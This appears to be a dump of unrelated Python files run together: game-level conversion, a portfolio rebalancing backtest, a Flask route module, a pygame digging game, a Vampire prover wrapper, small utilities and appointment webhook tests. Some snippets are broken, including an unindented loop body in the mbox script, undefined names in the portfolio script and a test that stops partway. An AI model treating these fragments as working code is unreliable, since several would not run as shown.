    """Return the processed-levels directory of a VGLC game under ~/data."""
    home = Path.home()
    return os.path.join(home, 'data', 'TheVGLC', game_name, 'Processed')
if __name__ == '__main__':
    # Convert each supported VGLC game into its own output level folder.
    convert(get_vglc_path("Super Mario Bros"), "SuperMarioBros", 3, convert_super_mario_bros_tile)
    convert(get_vglc_path("Super Mario Bros 2 (Japan)"), "SuperMarioBros2Japan", 3, convert_super_mario_bros_2_japan_tile)
    convert(get_vglc_path("Super Mario Land"), "SuperMarioLand", 3, convert_super_mario_bros_mario_land_tile)
    convert(os.path.join(get_vglc_path("Super Mario Bros 2"), 'WithEnemies'), "SuperMarioBros2", 3, convert_super_mario_bros_2_tile)
"""
badnwidth portfolio
similar to bandw-2-stackoverfl-almostoriginal.py
"""
## define functions
## define functions
def setup_df(df, A, B):
    """Prepare a two-asset price frame for the rebalancing simulation.

    Parameters
    ----------
    df : pandas.DataFrame with (at least) price columns named `A` and `B`.
    A, B : str, column names of the two assets.

    Returns a copy restricted to [A, B] with zero-initialised
    shares/value columns and the weight column 'wA'.
    """
    # .copy() avoids SettingWithCopy warnings on the column assignments below.
    df = df[[A, B]].copy()
    # Forward-fill missing prices (maybe remove).
    # .ffill() replaces the deprecated fillna(method='ffill').
    df = df.ffill()
    A_shares = A + '_shares'
    B_shares = B + '_shares'
    A_value = A + '_value'
    B_value = B + '_value'
    df[A_shares] = 0
    df[B_shares] = 0
    df[A_value] = 0
    df[B_value] = 0
    df['wA'] = 0
    return df
def invest(df, i, amount, perc, A, B):
    """
    Invest `amount` dollars at ordinal index i, putting fraction `perc`
    into asset A and the remainder into asset B, then propagate the
    resulting share counts, values and weight forward from i.
    This modifies df.
    """
    A_shares = A + '_shares'
    B_shares = B + '_shares'
    A_value = A + '_value'
    B_value = B + '_value'
    # Map column name -> positional index for iloc-based assignment.
    c = dict([(col, j) for j, col in enumerate(df.columns)])
    # Shares are bought at the price on day i and held from i onward.
    df.iloc[i:, c[A_shares]] = amount * perc / df.iloc[i, c[A]]
    df.iloc[i:, c[B_shares]] = amount * (1 - perc) / df.iloc[i, c[B]]
    # Mark-to-market values from i onward.
    df.iloc[i:, c[A_value]] = (
        df.iloc[i:, c[A]] * df.iloc[i:, c[A_shares]])
    df.iloc[i:, c[B_value]] = (
        df.iloc[i:, c[B]] * df.iloc[i:, c[B_shares]])
    # Weight of asset A in total portfolio value.
    df.iloc[i:, c['wA']] = (
        df.iloc[i:, c[A_value]] / (df.iloc[i:, c[B_value]] + df.iloc[i:, c[A_value]]))
def rebalance(df, tol, perc, A, B, i=0):
    """
    Rebalance df whenever the weight 'wA' drifts outside
    [perc - tol, perc + tol], starting the scan at index i.
    This modifies df (and also returns it).
    """
    c = dict([(col, j) for j, col in enumerate(df.columns)])
    A_value = A + '_value'
    B_value = B + '_value'
    while True:
        mask = (df['wA'] >= perc + tol) | (df['wA'] <= perc - tol)
        # ignore prior locations where the ratio falls outside tol range
        mask[:i] = False
        try:
            # Move i one index past the first index where mask is True
            # Note that this means the ratio at i will remain outside tol range
            i = np.where(mask)[0][0] + 1
        except IndexError:
            # No remaining breach of the tolerance band: we are done.
            break
        # recalc the amount we own today.
        amount = (df.iloc[i, c[A_value]] + df.iloc[i, c[B_value]])
        # invest that amount
        invest(df, i, amount, perc, A, B)
    return df
def create_pf(df, A, B, pf):
    """Combine the A and B value columns into portfolio column `pf`.

    `pf` is the portfolio column name; the summed value is converted to
    AUM via price2aum. Assumes `df` carries the columns created by
    invest()/rebalance(). Modifies and returns df.
    """
    df[pf] = df[f'{A}_value'] + df[f'{B}_value']
    df[pf] = price2aum(df[pf])
    return df
def rm_cols(df, A, B):
    """Return `df` without the intermediate *_shares / *_value columns."""
    helper_cols = [
        f'{asset}{suffix}'
        for suffix in ('_shares', '_value')
        for asset in (A, B)
    ]
    return df.drop(columns=helper_cols)
## create legacy (traditional) portfolio: 60/40 stocks/bonds, named TRD.
# choose assets
A1 = 'Stocks'
B1 = 'Bonds'
# read and setup
pri_fin_mat_2 = pd.read_csv(file_pri_fin, index_col = 'Date', parse_dates=True)
pri_fin_mat_2 = re_index_date(pri_fin_mat_2)
df_trd = setup_df(pri_fin_mat_2, A=A1, B=B1)
del pri_fin_mat_2
# rebalance: 60% stocks, 5% tolerance band
perc1 = 0.60
tol1 = 0.05
invest(df_trd, i=0, amount=100, perc=perc1, A=A1, B=B1)
rebalance(df_trd, tol=tol1, perc=perc1, A=A1, B=B1)
# create the portfolio column
pf1 = 'TRD'
df_trd = create_pf(df_trd, A1, B1, pf1)
# remove intermediate cols (shares and value)
df_trd = rm_cols(df_trd, A1, B1)
# plot weight with the tolerance band as dashed lines
df_trd.wA.plot()
plt.ylabel('Weight in ' + A1)
plt.axhline(y=perc1 + tol1, color='black', linestyle='--')
plt.axhline(y=perc1 - tol1, color='black', linestyle='--')
# see max min w
df_trd.wA.min(), df_trd.wA.max()
# plot performance
price2aum(df_trd[[A1, B1, pf1]]).plot()
# see
df_trd.head()
## create bandwidth portfolio: 5% BLX / 95% TRD. Named BAL for balanced.
# choose assets
A2 = 'BLX'
B2 = 'TRD' # a 60/40 stocks/bonds
# read and setup: inner-join TRD with the BLX price series
df_bal = pd.concat([df_trd['TRD'], pri_mat['BLX']], axis=1, join='inner')
df_bal = df_bal.reindex()
assert (df_bal.index == pri_mat.index).all()
df_bal = setup_df(df_bal, A2, B2)
# rebalance: 5% BLX, 2% tolerance band
perc2 = 0.05
tol2 = 0.02
invest(df_bal, i=0, amount=100, perc=perc2, A=A2, B=B2)
rebalance(df_bal, tol=tol2, perc=perc2, A=A2, B=B2)
# create the portfolio column
#pf2 ='5/95 BLX/TRD'
pf2 = 'BAL'
df_bal = create_pf(df=df_bal, A=A2, B=B2, pf=pf2)
df_bal.head()
# remove intermediate cols (shares and value)
df_bal = rm_cols(df_bal, A=A2, B=B2)
# plot weight
df_bal.wA.plot()
ylabel2 = 'Weight in ' + A2 + '\n is ' + str(perc2) + ' +- ' + str(tol2)
plt.ylabel(ylabel2)
plt.axhline(y=perc2 + tol2, color='black', linestyle='--')
plt.axhline(y=perc2 - tol2, color='black', linestyle='--')
title2 = 'Bandwidth rebalanced portfolio \n with 5% BLX and 95% TRD'
plt.title(title2)
plt.savefig('output/df_bal.wA.png')
# plot performance
#price2aum(df_bal[[A2, B2, pf2]]).plot(logy=True)
price2aum(df_bal[[B2, pf2]]).plot()
title3 = 'TRD vs BAL: \n Traditional 60%/40% stocks/bonds portfolio (TRD) \n vs 5%/95% BLX/TRD bandwidth rebalanced (BAL)'
plt.title(title3)
plt.savefig('output/df_bal-aum.png')
## plot 1% and 5% allocation to blx.
## plot area weights stocks/bonds/blx in the BALanced portf
# not same index => must join
df_bal.shape != df_trd.shape
# concat, inner join
df_bal_w = pd.concat([df_trd.wA, df_bal.wA], axis=1, join='inner')
df_bal_w.columns = ['w_stocks_in_trd', 'w_blx_in_bal']
assert (df_bal_w.w_blx_in_bal == df_bal.wA).all()
# weight on stock in balanced pf = weights in TRD * (1 - blx weight)
df_bal_w['w_stocks_in_bal'] = df_bal_w['w_stocks_in_trd'] * (1 - df_bal_w.w_blx_in_bal)
# weight in bond is the rest
df_bal_w['w_bonds_in_bal'] = 1 - df_bal_w.w_blx_in_bal - df_bal_w['w_stocks_in_bal']
# NOTE(review): column order below assumed to match the data; verify.
df_bal_w.columns = ['removecol', 'BLX', 'Stocks', 'Bonds'] # think it is like this
df_bal_w.drop('removecol', axis=1, inplace=True)
# plot stacked-area allocation chart
df_bal_w.plot.area(color=['#483d8b', '#ee82ee', '#a020f0'], alpha=0.8)
title4 = 'BAL portfolio: \n 5% to BLX and 95% to 60/40 stocks/bonds'
title5 = 'BAL portfolio: 5% in BLX and 95% in TRD'
plt.title(title5)
plt.ylabel('Allocation in BAL portfolio')
plt.legend(loc=(1.04,0))
plt.savefig('output/df_bal_w.png')
"""
todo maybe call it TRD for traditional not LEG for legacy. then we can say traditional 60/40
todo fix index as datetime! either via new = df.resample('T', how='mean') or via re_index_date
"""
|
# Demo: write the elements of a list to a text file, one per line.
#
# Open-mode reference:
#   'r'  read-only; raises if the file does not exist
#   'w'  write; creates the file in the current directory if missing
#   'r+' read+write; allows appending to an existing file
#
# NOTE(review): the original also built an unused dict named `dict`,
# shadowing the builtin; it has been dropped here.
ls = ['1', '2', '3', '4', '5']
# A `with` block guarantees the file is closed even on error
# (the original relied on an explicit close and a misused for-else).
with open("readfile.txt", 'w', encoding='utf-8') as file:
    for i in ls:
        # Write each list element on its own line.
        file.write(i + "\n")
# Report success once all lines are written.
print("数据写入成功!")
|
from zz import app
from flask import request,render_template,flash,abort,url_for,redirect,session,Flask,g
from zz.dao import lovemapper
from zz.redissession import redis
from zz.auth import shouquan_required
# Dating ("love") module.


# Dating module: index page.
@app.route("/love/index/<id>")
@app.route("/love/index")
@app.route("/love/index/")
@shouquan_required
def love_index(id=0):
    """Render the dating index page for the user with the given id.

    id defaults to 0 when the URL carries no id segment.
    """
    # Validation is skipped here for now; handled by the decorator later.
    # Determine the profile to show (male/female) via the mapper.
    loveuser = lovemapper.getIndexOne(id)
    return render_template("html/loveuser/index.html",
                           loveuser=loveuser)
# Dating module: message page.
@app.route("/love/msg")
def love_msg():
    """Render the message page with the value stored under 'test' in redis."""
    msg = str(redis.get("test"))
    return render_template("html/loveuser/msg.html",
                           msg=msg)
#! /usr/local/bin/python
import pygame
from pygame.locals import *
import world, gfx
def fade(img, depth):
    """Return a copy of pygame surface `img` blended toward grey (128,128,128).

    `depth` is a 0..1 fraction: 0 returns an unmodified copy, 1 is fully
    grey. Alpha is preserved. Per-pixel get_at/set_at is slow but runs only
    once per image at load time (see depth_img).
    """
    ret_val = img.copy()
    if(depth == 0): return ret_val
    for x in xrange(ret_val.get_width()):
        for y in xrange(ret_val.get_height()):
            (r, g, b, a) = ret_val.get_at((x,y))
            ret_val.set_at((x,y), (128*depth + r*(1-depth),
                                   128*depth + g*(1-depth),
                                   128*depth + b*(1-depth),
                                   a))
    return ret_val
class depth_img:
    """An image pre-faded at 8 depth levels (see fade()) for depth cueing."""

    def __init__(self, name):
        # Pre-compute all 8 fade levels once at load time.
        img = pygame.image.load('gfx/'+name+'.png')
        self.d = [ fade(img, i/8.0).convert_alpha()
                   for i in xrange(8) ]

    def level(self, lev):
        """Return the pre-faded surface for depth `lev`, clamped to 0..7."""
        if lev < 0: return self.d[0]
        if lev > 7: return self.d[7]
        return self.d[lev]
#typeahead command examples. Applies to the selected area.
#'excavate'
#'mine [for <material>] [and deliver to <place>]'
#'fill [with <material>]'
#'move [<object type>] to <place>'
#'build [<thing>]'
#'evacuate [to <place>]'
#'finish walls'
#'clean up'
#modifiers:
#', <dwarf name>/everyone'
#'with priority <number>'
#display with icons for each dwarf, and a number indicating the
#priority of the current task?
class dagger_io:
    """Main interactive loop: cursor movement, box selection, dig/build."""

    def main(self):
        w = world.world
        clock = pygame.time.Clock()
        # Selection start (ss*) and end (se*) corners in world coordinates.
        (ssx, ssy, ssz) = (0,0,0)
        (sex, sey, sez) = (0,0,0)
        # 3D cursor sprite, drawn with priority 1.
        csr = gfx.sprite_3d(gfx.mark1, 0, 0, 0, pri=1)
        gfx.change_cut(csr.z)
        # Seed a flat starting area around the origin.
        for ix in range(-5,30):
            for iy in range(-5,30):
                w(ix,iy,0)
        # Optional Python 2 JIT accelerator; harmless if missing.
        try:
            import psyco
            psyco.full()
        except:
            print "Installing Psyco might make this run faster."
        while 1:
            clock.tick(25)  # cap the loop at 25 FPS
            for event in pygame.event.get():
                if event.type == QUIT: return
                elif event.type == KEYUP:
                    # Releasing shift finalizes the selection box.
                    if event.key == K_LSHIFT:
                        (sex, sey, sez) = (csr.x, csr.y, csr.z)
                        print sex, sey, sez
                        gfx.paint_selection((ssx,ssy,ssz), (sex, sey, sez))
                        print clock.get_fps()
                elif event.type == KEYDOWN:
                    if event.key == K_ESCAPE:
                        return
                    # Arrow keys move the cursor in the x/y plane.
                    if event.key == K_LEFT:
                        csr.move(-1,0,0)
                    elif event.key == K_RIGHT:
                        csr.move(1,0,0)
                    elif event.key == K_UP:
                        csr.move(0,1,0)
                    elif event.key == K_DOWN:
                        csr.move(0,-1,0)
                    # Period/comma move one z-layer and re-cut the view.
                    elif event.key == K_PERIOD:
                        csr.move(0,0,-1)
                        gfx.change_cut(csr.z)
                    elif event.key == K_COMMA:
                        csr.move(0,0,1)
                        gfx.change_cut(csr.z)
                    elif event.key == K_LSHIFT:
                        # Pressing shift starts a new selection at the cursor.
                        (ssx, ssy, ssz) = (csr.x, csr.y, csr.z)
                        #w.invert(csr.x, csr.y, csr.z)
                    elif event.key == K_SPACE:
                        w.invert(csr.x, csr.y, csr.z)
                    elif event.key == K_r:
                        w.realize(csr.x, csr.y, csr.z)
                    elif event.key == K_2:
                        # Fill or dig the whole selected box, depending on
                        # whether the end-corner cell is currently empty.
                        fill = (w(sex, sey, sez) == None)
                        for ix in range(min(ssx, sex), max(ssx, sex)+1):
                            for iy in range(min(ssy, sey), max(ssy, sey)+1):
                                for iz in range(min(ssz, sez), max(ssz, sez)+1):
                                    if fill:
                                        w.construct(ix,iy,iz)
                                    else:
                                        w.dig(ix,iy,iz)
                    else:
                        print event.key, event
                        print clock.get_fps()
            world.process_structural_failure()
            gfx.paint_frame()
            framerate = clock.get_fps()
            if framerate < 20:
                print "low framerate: ", framerate
#        screen.blit(background, (0,0))
#        for z in range(7,-1+csr.z,-1):
#            for x in xrange(25):
#                for y in xrange(24,-1,-1):
#                    w_loc = 24 * x + 12 * y
#                    h_loc = 12 * x - 24 * y + 13 * z + 400
#                    if (csr.z, csr.x, csr.y) == (z, x, y):
#                        screen.blit(self.cursor_bot_img.level(0),
#                                    (w_loc, h_loc))
#                    if world[x][y][z] == 1:
#                        screen.blit(self.block_img.level(z),
#                                    (w_loc, h_loc))
#                    if (csr.z, csr.x, csr.y) == (z, x, y):
#                        screen.blit(self.cursor_top_img.level(0),
#                                    (w_loc, h_loc))
#
#        pygame.display.flip()
# Start the interactive loop when run as a script.
if __name__ == '__main__': dagger_io().main()
|
import copy
import itertools
import json
import logging
import os
import re
import tempfile
import numpy as np
import pandas as pd
import tensorflow as tf
from questions import config
from . import process
from . import symbols
# Module-level logger.
log = logging.getLogger(__name__)
# Symbol types whose precedence can be overridden via precedence files.
supported_precedence_names = ['predicate', 'function']
class Result(process.Result):
    """Result of one Vampire run: process result plus parsed extras."""

    def __init__(self, process_result, result_symbols, clauses):
        log.debug(process_result)
        # Copy every field from the underlying process result.
        super().__init__(**process_result.__dict__)
        self.symbols = result_symbols
        self.clauses = clauses

    # Column dtypes used when results are collected into a pandas frame.
    pd_dtypes = {
        **process.Result.pd_dtypes,
        'time_elapsed_vampire': float,
        'saturation_iterations': pd.UInt32Dtype(),
        'memory_used': pd.UInt32Dtype()
    }

    def symbols_of_type(self, symbol_type):
        """Return the subset of self.symbols of the given symbol type."""
        return symbols.symbols_of_type(self.symbols, symbol_type)

    @property
    def saturation_iterations(self):
        """Main-loop iteration count parsed from stdout, or None if absent."""
        try:
            return int(re.search(r'^% Main loop iterations started: (\d+)$', self.stdout, re.MULTILINE)[1])
        except TypeError:
            # re.search returned None: the line was not in the output.
            return None

    @property
    def memory_used(self):
        """Memory usage in KB parsed from stdout, or None if absent."""
        try:
            return int(re.search(r'^% Memory used \[KB\]: (\d+)$', self.stdout, re.MULTILINE)[1])
        except TypeError:
            return None

    @property
    def time_elapsed_vampire(self):
        """Wall time in seconds reported by Vampire, or None if absent."""
        try:
            return float(re.search(r'^% Time elapsed: (\d+\.\d+) s$', self.stdout, re.MULTILINE)[1])
        except TypeError:
            return None
def call(problem, options=None, timeout=None, precedences=None, get_symbols=False, get_clauses=False, get_stdout=True,
         get_stderr=True):
    """Run Vampire on `problem` and return a Result.

    precedences: optional mapping from symbol type ('predicate'/'function')
    to a precedence array, written to a temp file and passed to Vampire.
    get_symbols / get_clauses: also load the symbol table / clause JSON
    that Vampire was asked to dump; a missing file is tolerated, any other
    loading failure is re-raised as RuntimeError.
    """
    try:
        mode = options['mode']
    except (KeyError, TypeError):
        # TypeError covers the default options=None (None is unsubscriptable);
        # the original only caught KeyError and crashed in that case.
        mode = None
    log.debug(f'Running Vampire. Problem: {problem}. Mode: {mode}.')
    result_symbols = None
    clauses = None
    with OptionManager(problem, base_options=options, precedences=precedences, get_symbols=get_symbols,
                       get_clauses=get_clauses) as option_manager:
        args_instantiated = option_manager.args()
        result = process.run(args_instantiated, timeout=timeout, capture_stdout=get_stdout, capture_stderr=get_stderr)
        if get_symbols:
            try:
                result_symbols = option_manager.symbols()
            except FileNotFoundError:
                # Vampire did not produce the symbols file (e.g. early exit).
                pass
            except Exception as e:
                raise RuntimeError(f'Failed to load symbols of problem {problem}.') from e
        if get_clauses:
            try:
                clauses = option_manager.clauses()
            except (FileNotFoundError, json.JSONDecodeError):
                pass
            except Exception as e:
                raise RuntimeError(f'Failed to load clauses of problem {problem}.') from e
    return Result(result, result_symbols, clauses)
def random_precedence(symbol_type, length, seed=None, dtype=np.uint32):
    """Draw a random symbol precedence: a permutation of 0..length-1.

    For predicates, index 0 (the equality symbol, by Vampire convention)
    is always placed first. When a seed is given it is salted with the
    symbol type so predicate and function precedences differ even for the
    same base seed.
    """
    if seed is not None:
        salt = supported_precedence_names.index(symbol_type)
        base = seed if isinstance(seed, tuple) else (seed,)
        # Salt the seed for the given symbol type.
        seed = (salt,) + base
    rng = np.random.RandomState(seed)
    if symbol_type == 'predicate':
        # Keep equality (index 0) first and permute the rest.
        tail = rng.permutation(np.arange(1, length, dtype=dtype))
        res = np.concatenate((np.asarray([0], dtype=dtype), tail))
    else:
        res = rng.permutation(np.arange(length, dtype=dtype))
    assert res.dtype == dtype
    assert res.shape == (length,)
    return res
def program():
    """Path of the Vampire executable: $VAMPIRE if set, else 'vampire'."""
    return os.environ.get('VAMPIRE', 'vampire')
def include_path():
    """TPTP include directory passed to Vampire via the --include option."""
    return config.tptp_path()
class OptionManager:
    """Context manager preparing the files behind Vampire's CLI options.

    While active, it owns a temporary directory holding the precedence CSV
    inputs and the symbols/clauses output paths, and renders the final
    command-line arguments for a run.
    """

    def __init__(self, problem, base_options=None, precedences=None, get_symbols=False, get_clauses=False):
        self.problem = problem
        if base_options is None:
            base_options = {}
        self.base_options = base_options
        if precedences is None:
            precedences = {}
        # Only predicate/function precedences are supported.
        assert set(precedences.keys()) <= set(supported_precedence_names)
        self.precedences = precedences
        self.symbols_enabled = get_symbols
        self.clauses_enabled = get_clauses
        # Created lazily in __enter__, and only when actually needed.
        self.temp_dir = None

    def enabled(self):
        # A temp dir is only needed to pass precedences or collect outputs.
        return len(self.precedences) > 0 or self.symbols_enabled or self.clauses_enabled

    def __enter__(self):
        if self.enabled():
            self.temp_dir = tempfile.TemporaryDirectory(prefix=f'{config.program_name()}_', dir=config.scratch_dir())
            for name, precedence in self.precedences.items():
                if isinstance(precedence, tf.Tensor):
                    precedence = precedence.numpy()
                # Vampire expects a comma-separated list of symbol indices.
                precedence.tofile(self.precedence_path(name), sep=',')
        return self

    def __exit__(self, type, value, traceback):
        if self.temp_dir is not None:
            self.temp_dir.cleanup()
            self.temp_dir = None

    def options(self):
        """Base options plus generated precedence/output-file options."""
        res = copy.deepcopy(self.base_options)
        for name, precedence in self.precedences.items():
            assert name in supported_precedence_names
            res[f'{name}_precedence'] = self.precedence_path(name)
        if self.symbols_enabled:
            res['symbols_csv_output'] = self.symbols_path()
        if self.clauses_enabled:
            res['clauses_json_output'] = self.clauses_path()
        include = include_path()
        if include is not None:
            res['include'] = include
        return res

    def args(self):
        """Full command line: program, problem path, then --name value pairs."""
        return list(itertools.chain([program(), config.full_problem_path(self.problem)],
                                    *((f'--{name}', str(value)) for (name, value) in self.options().items())))

    def symbols(self):
        """Load the symbols CSV that Vampire wrote."""
        return symbols.load(self.symbols_path())

    def clauses(self):
        """Load the clauses JSON that Vampire wrote."""
        return load_clauses(self.clauses_path())

    def precedence_path(self, name):
        return os.path.join(self.temp_dir.name, f'{name}_precedence.csv')

    def symbols_path(self):
        return os.path.join(self.temp_dir.name, 'symbols.csv')

    def clauses_path(self):
        return os.path.join(self.temp_dir.name, 'clauses.json')
def load_clauses(file):
    """Load the JSON clause list Vampire dumped to `file`."""
    # Throws FileNotFoundError if `file` does not exist.
    log.debug(f'Loading {file} of size {os.path.getsize(file)}.')
    # Throws json.JSONDecodeError if the content is malformed.
    with open(file) as f:
        return json.load(f)
def save_clauses(clauses, file):
    """Serialise `clauses` to `file` as JSON."""
    with open(file, 'w') as out:
        json.dump(clauses, out)
|
import mailbox
import csv
writer = csv.writer(open("output.csv", "wb"))
for message in mailbox.mbox('input.mbox'):
writer.writerow([message['message-id'], message['subject'], message['from']])
print 'Mboxing complete! *high five*'
|
def removeDuplicates(nums):
    """
    Remove duplicates from the sorted list `nums` in place.

    :type nums: List[int]
    :rtype: int -- number of unique elements; nums[:k] holds them in order.
    """
    if not nums:
        return 0
    write = 0
    for read in range(1, len(nums)):
        # Advance the write pointer only when a new value appears.
        if nums[read] != nums[write]:
            write += 1
            nums[write] = nums[read]
    return write + 1
# Demo: dedupe a sorted list and show the compacted result.
nums = [0,0,1,1,1,2,2,3,3,4]
print(removeDuplicates(nums))
print(nums)
|
from datetime import datetime, timedelta
from tcsocket.app.models import sa_appointments, sa_services
from tcsocket.app.worker import delete_old_appointments, startup
from .conftest import MockEngine, count, create_appointment, create_company, select_set, signed_request
async def create_apt(cli, company, url=None, **kwargs):
    """POST a signed webhook appointment (id 123 by default).

    Any field can be overridden via kwargs; `url` defaults to the
    appointment-123 webhook endpoint of `company`.
    """
    defaults = {
        'id': 123,
        'service_id': 123,
        'service_name': 'testing service',
        'extra_attributes': [],
        'colour': '#abc',
        'appointment_topic': 'testing appointment',
        'attendees_max': 42,
        'attendees_count': 4,
        'attendees_current_ids': [1, 2, 3],
        'start': '1986-01-01T12:00:00',
        'finish': '1986-01-01T13:00:00',
        'price': 123.45,
        'location': 'Whatever',
    }
    payload = {**defaults, **kwargs}
    target = url or f'/{company.public_key}/webhook/appointments/123'
    return await signed_request(cli, target, **payload)
async def test_create(cli, db_conn, company):
    """Creating an appointment also creates its service row correctly."""
    r = await create_apt(cli, company)
    assert r.status == 200, await r.text()
    # Check the service row written by the webhook.
    curr = await db_conn.execute(sa_services.select())
    result = await curr.first()
    assert result.id == 123
    assert result.company == company.id
    assert result.name == 'testing service'
    assert result.colour == '#abc'
    assert result.extra_attributes == []
    # Check the appointment row written by the webhook.
    curr = await db_conn.execute(sa_appointments.select())
    result = await curr.first()
    assert result.service == 123
    assert result.topic == 'testing appointment'
    assert result.attendees_max == 42
    assert result.attendees_count == 4
    assert result.attendees_current_ids == [1, 2, 3]
    assert result.start == datetime(1986, 1, 1, 12, 0)
    assert result.finish == datetime(1986, 1, 1, 13, 0)
    assert result.price == 123.45
    assert result.location == 'Whatever'
async def test_delete(cli, db_conn, company):
    """Deleting an appointment removes it and its now-unused service."""
    url = f'/{company.public_key}/webhook/appointments/231'
    r = await create_apt(cli, company, url)
    assert r.status == 200, await r.text()
    assert 1 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200, await r.text()
    assert {'status': 'success'} == await r.json()
    assert 0 == await count(db_conn, sa_appointments)
    assert 0 == await count(db_conn, sa_services)
    # A second delete should do nothing (idempotent, reported as not found).
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200, await r.text()
    assert {'status': 'appointment not found'} == await r.json()
    assert 0 == await count(db_conn, sa_appointments)
    assert 0 == await count(db_conn, sa_services)
async def test_delete_keep_service(cli, db_conn, company):
    """Deleting one of two appointments keeps their shared service row."""
    r = await create_apt(cli, company)
    assert r.status == 200, await r.text()
    url = f'/{company.public_key}/webhook/appointments/124'
    r = await create_apt(cli, company, url)
    assert r.status == 200, await r.text()
    # Two appointments share a single service.
    assert 2 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200, await r.text()
    assert {'status': 'success'} == await r.json()
    # The service survives because another appointment still uses it.
    assert 1 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)
async def test_delete_wrong_company(cli, db_conn, company):
    """A company cannot delete another company's appointment."""
    company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
    r = await create_apt(cli, company2)
    assert r.status == 200, await r.text()
    # Deleting via the wrong company's endpoint must not find it.
    url = f'/{company.public_key}/webhook/appointments/123'
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200, await r.text()
    assert {'status': 'appointment not found'} == await r.json()
    assert 1 == await count(db_conn, sa_appointments)
    # The owning company can delete it.
    url = f'/{company2.public_key}/webhook/appointments/123'
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200, await r.text()
    assert {'status': 'success'} == await r.json()
    assert 0 == await count(db_conn, sa_appointments)
async def test_create_conflict(cli, db_conn, company):
    """Creating the same appointment id under a second company conflicts."""
    r = await create_apt(cli, company)
    assert r.status == 200, await r.text()
    company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
    r = await create_apt(cli, company2)
    assert r.status == 409, await r.text()
async def test_extra_attrs(cli, db_conn, company):
    """Extra attributes end up on the service, sorted by sort_index with the
    sort_index key itself stripped from each entry."""
    extra_attrs = [
        {'name': 'Foobar', 'type': 'checkbox', 'machine_name': 'foobar', 'value': False, 'sort_index': 124},
        {'name': 'Smash', 'type': 'text_short', 'machine_name': 'smash', 'value': 'I love to party', 'sort_index': 123},
    ]
    r = await create_apt(cli, company, extra_attributes=extra_attrs)
    assert r.status == 200, await r.text()
    curr = await db_conn.execute(sa_services.select())
    result = await curr.first()
    assert result.name == 'testing service'
    # remove sort_index and reverse so they're ordered by sort_index
    eas = list(reversed([{k: v for k, v in ea_.items() if k != 'sort_index'} for ea_ in extra_attrs]))
    assert result.extra_attributes == eas
async def test_delete_old_appointments(db_conn, company, settings):
    """delete_old_appointments removes appointments older than about a week and
    any services left without appointments."""
    n = datetime.utcnow()
    await create_appointment(db_conn, company, appointment_extra={'id': 1, 'start': n}, service_extra={'id': 1})
    await create_appointment(
        db_conn, company, appointment_extra={'id': 2, 'start': n - timedelta(days=8)}, service_extra={'id': 2}
    )
    await create_appointment(
        db_conn, company, appointment_extra={'id': 3, 'start': n - timedelta(days=6)}, service_extra={'id': 3}
    )  # not old enough
    await create_appointment(
        db_conn,
        company,
        appointment_extra={'id': 4, 'start': n - timedelta(days=365)},
        service_extra={'id': 3},
        create_service=False,
    )
    ctx = {'settings': settings}
    await startup(ctx)
    ctx['pg_engine'] = MockEngine(db_conn)
    assert {(1, 1), (2, 2), (3, 3), (4, 3)} == await select_set(
        db_conn, sa_appointments.c.id, sa_appointments.c.service
    )
    assert {(1,), (2,), (3,)} == await select_set(db_conn, sa_services.c.id)
    await delete_old_appointments(ctx)
    # appointments 2 and 4 are gone; service 2 lost its only appointment and is
    # deleted, service 3 is kept alive by appointment 3
    assert {(1, 1), (3, 3)} == await select_set(db_conn, sa_appointments.c.id, sa_appointments.c.service)
    assert {(1,), (3,)} == await select_set(db_conn, sa_services.c.id)
async def test_clear_apts(cli, db_conn, company):
    """The clear endpoint deletes all appointments and services of the
    requesting company only; other companies' data is untouched."""
    company2 = await create_company(db_conn, 'compan2_public', 'compan2_private', name='company2')
    # a second service, owned by company2
    await db_conn.execute(
        sa_services.insert().values(
            **dict(
                id=2,
                company=company2.id,
                name='testing service',
                extra_attributes=[
                    {
                        'name': 'Foobar',
                        'type': 'text_short',
                        'machine_name': 'foobar',
                        'value': 'this is the value of foobar',
                    }
                ],
                colour='#abc',
            )
        )
    )
    await create_appointment(db_conn, company, appointment_extra={'id': 1})
    # 10 more appointments for the first company (its existing service)
    for i in range(10):
        await create_appointment(
            db_conn,
            company,
            create_service=False,
            appointment_extra=dict(
                id=i + 2,
                start=datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1),
                finish=datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1),
            ),
        )
    # 10 appointments for company2 on service 2
    for i in range(11, 21):
        await create_appointment(
            db_conn,
            company2,
            create_service=False,
            appointment_extra=dict(
                id=i + 2,
                start=datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=i + 1),
                finish=datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=i + 1),
            ),
            service_extra=dict(id=2),
        )
    assert 21 == await count(db_conn, sa_appointments)
    assert 2 == await count(db_conn, sa_services)
    url = cli.server.app.router['webhook-appointment-clear'].url_for(company='thepublickey')
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200
    assert {'status': 'success'} == await r.json()
    # only company2's 10 appointments and single service remain
    assert 10 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)
async def test_mass_apts(cli, db_conn, company):
    """Mass webhook: POST a batch of appointments, then a mixed batch of
    POSTs and DELETEs; all payloads share service 1."""

    def build_apt(apt_id, day_offset):
        # one appointment payload on the shared service
        return dict(
            id=apt_id,
            service_id=1,
            service_name='test service',
            extra_attributes=[],
            colour='#000000',
            appointment_topic='testing appointment',
            attendees_max=42,
            attendees_count=4,
            attendees_current_ids=[1, 2, 3],
            start=str(datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=day_offset)),
            finish=str(datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=day_offset)),
            price=123.45,
            location='Whatever',
            ss_method='POST',
        )

    await create_appointment(db_conn, company, appointment_extra={'id': 1})
    assert 1 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)

